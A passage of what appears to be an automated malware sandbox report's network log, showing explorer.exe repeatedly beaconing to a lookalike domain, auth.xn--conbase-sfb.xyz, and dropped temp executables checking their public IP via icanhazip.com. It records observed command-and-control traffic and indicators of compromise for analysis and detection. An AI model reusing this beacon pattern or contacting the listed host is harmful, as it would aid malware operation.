                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hDGCho4fsLZYjEMvgNK0AJi%2BFFgLcPzEAEt9HCC8wVeHVveP%2BP3f%2F9rwCHQoyuJjvP6sdEXiXJ7Z74p8u8JuENZBimGM0jEck34Bhmk5k%2FlpgbYnfAbOD0TLQVzRjoHbhQS5goZ11vZrjoQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef408f8c5a72a7-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.337852001 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:36 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hDGCho4fsLZYjEMvgNK0AJi%2BFFgLcPzEAEt9HCC8wVeHVveP%2BP3f%2F9rwCHQoyuJjvP6sdEXiXJ7Z74p8u8JuENZBimGM0jEck34Bhmk5k%2FlpgbYnfAbOD0TLQVzRjoHbhQS5goZ11vZrjoQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef408f8c5a72a7-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                86192.168.2.449877188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.461673021 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:36.468810081 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.172996044 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:37 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9LssfI9cMQ1FqRBl7gQSWund9mED3QdQOiJv2n6h8x006Cs95RVND3bA1wqve2CCZVncv36IJlVUd%2Fl6jBdy2WrF7sIAqke%2FItqaZCuT68nFWm0DZaVmNmFyIr1lHj2ntNVYbOB%2FzP43N8M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40968847c35d-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                87192.168.2.449878188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.292021990 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.300781965 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.015081882 CEST615INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:37 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UEAGuWETlvXKrSwSAH88A1Xh7F0BSahHr0EMF6jOfoy7fvU3iNkNF3OU1K9c2k1iu4e%2B3dZuMvG37LXvChgaufjXHnzg1J8Rfi0uLuWlOyfypQ6nUeIP2gijrMu%2BSqKZoTNB0z7rrArO9uw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef409bba998c36-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                88192.168.2.449879104.16.184.241805720C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:37.860553026 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                Host: icanhazip.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.344912052 CEST534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:38 GMT
                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                Content-Length: 12
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                Set-Cookie: __cf_bm=pXXqrygNoLCpqeC3Untmk3YzSeWRaQj2rwEOCMqhKwI-1720265318-1.0.1.1-EY9pYnVY98Oh9As0kbdPGVbZnOnuKys15BCoDWag.kKkj9GxI4.h1zu2dSK9gkS8BPq9pt..F0NOy3f6WBnHDQ; path=/; expires=Sat, 06-Jul-24 11:58:38 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef409f4b131a3c-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                                                                                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                89192.168.2.449881188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.134119034 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.139416933 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:38.892610073 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:38 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=voIwS1kA2k%2BmqDyLxZnO9XmSj1Ct5wMu73%2FENyC0FaMT9grQqf6mPUehmOQe%2BLOonvwcotvYNqViZJsezIu%2Ff6QdehrJEVc0sHDVFMb0X%2BCjDI5TdaAfgEz3ooG6EqQYw742gVJnDpOfsKA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40a0fc5c19bf-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                90192.168.2.449884188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.235518932 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:39.240536928 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.039648056 CEST631INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:39 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pR%2Br%2BbyeG1J%2BIrCv4toEeogtjoT%2FO8L%2FmV7JaMz2o4P51SxV%2FnXeYQln%2B4kaxUPVXIc%2F93kD6W4fb9bav4PjSxOiwfNvkx%2BNBKKcR%2FFxknX4c2n6MAhNeT7W5xZ6gesozyoQ5ZHMs3zsaeA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40a7de81198e-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                91192.168.2.449886188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.168982029 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:40.179739952 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.063422918 CEST613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:44 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w6OLWEvMetwF5NcOYKvPAZUoUoWM5OuMYcT%2BPD72ksc9NCI8Ed8Ep1d02PAUA0K2zXknOdBhPFd6ekZKbNuSz7GfKPNxJOIHBb67LaRmP2pklCeIW5kQjgn8QJ4pXVGx0dUNTaTl6xpoiiM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40adbbc07286-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                92192.168.2.449889104.16.184.24180420C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:41.807845116 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                Host: icanhazip.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Jul 6, 2024 13:28:42.274327040 CEST534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:42 GMT
                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                Content-Length: 12
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                Set-Cookie: __cf_bm=_5LUlX8Jv2EjJGPUuJDEDXxJzujlGhDnoVfKkDnnHso-1720265322-1.0.1.1-WnsVbth2x5gCfGLP1jJ.Mhl5Gww5S9Mmoaq4m7oApUCYtzBf93DqYrt1i0IYj9BbOI0hzlvoGreyeBOXDAlxHg; path=/; expires=Sat, 06-Jul-24 11:58:42 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40b7edc132d9-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                                                                                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                93192.168.2.449893188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.222148895 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.226982117 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:44.962307930 CEST623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:44 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eQse5bUsUFlQ71qiK%2BIb0saghSOoN%2B%2BOLTuysMftN2R8ZHE24MhMbS%2BZVGw7jCArYLoOTBW9TJVgVesImhSdm6R%2BWGM2%2Bc0x4HQ0CZfVUU6bKVtrQXsLvA6i5dwj3jzUXy19SZd45ziqRqo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40c70add4201-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                94192.168.2.449896188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.086632967 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.091665030 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.789647102 CEST615INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:45 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tbtK%2BBJN0CXrjotziS3hCGixov2ZvYvVAfARkHdEujxPN1RrecifmfBrZQYfyUjKkOq1yOkYj5Qg9VwpCORFpQ1NX0iKs6uwhfkJpvbf8qcJYqG6%2Bv7kiZLZX1dvyYumumBYGgDD0KwggQg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40cc5fdd43d7-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                95192.168.2.449900188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.914532900 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:45.919430971 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.753660917 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:46 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0wbef2ai5bxNVet%2FlWkySihVb2DuCjYrNHeLvnp714F7kn4MpLpgAL86tLcRz%2FRQgZAm0BoycMUruKdciiTC15EWLhXIbAfIfmM5Jo%2FuniQqEG90iY0HV9lgEcwbB4bo6qHJjRzm8xdP%2FbU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40d19e3c0c82-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                96192.168.2.449901188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.868284941 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:46.874512911 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.617403030 CEST615INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:47 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r9keYDSCLk18UEDaDQCgkBhopxjHDekHYhj1HXjsfRbZvTTWY43RLzbV13plBQj8jppUxTGkud6bKPmwFI1jaQti61rOAOpeJQYxjdzLf2K6e9YIF0I%2F1%2FoKQMgZcDqoM4e5LZABaE3bbYA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40d78a4742c2-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                97192.168.2.449904188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.745851040 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:47.754070997 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.485898018 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:48 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PvZIhArArgp259wBCrmZdMX06bT8eCi%2Bp0f%2Fh4tLMy%2Bisy1VW8c3SlkUrWB5qv%2FCpbzJfnwGrKQrZJHA%2FFfx2i4DhHnJUtUGFOBmPR9pTkK96h01IpWkFmQFb5QShvCvseKi9iOPB6FRPn4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40dd0a097d18-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                98192.168.2.449906188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.614243031 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:48.619786024 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:28:49.330326080 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:49 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZvlITO8Iu3Jj8KpfP%2FGXAxllLOXoZ5e%2Ff9QpC%2FXHybycsT4dnPWB9GgeyURofnFx3yTg6Nr5BcCO7Tz8ZOERYl6iN6oQAYFXf5xgQNcYkLrL8FWKxqRQYQQRZx8mGjLVlErZYDiUd%2FXSZD0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40e26e794398-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                99192.168.2.449907188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
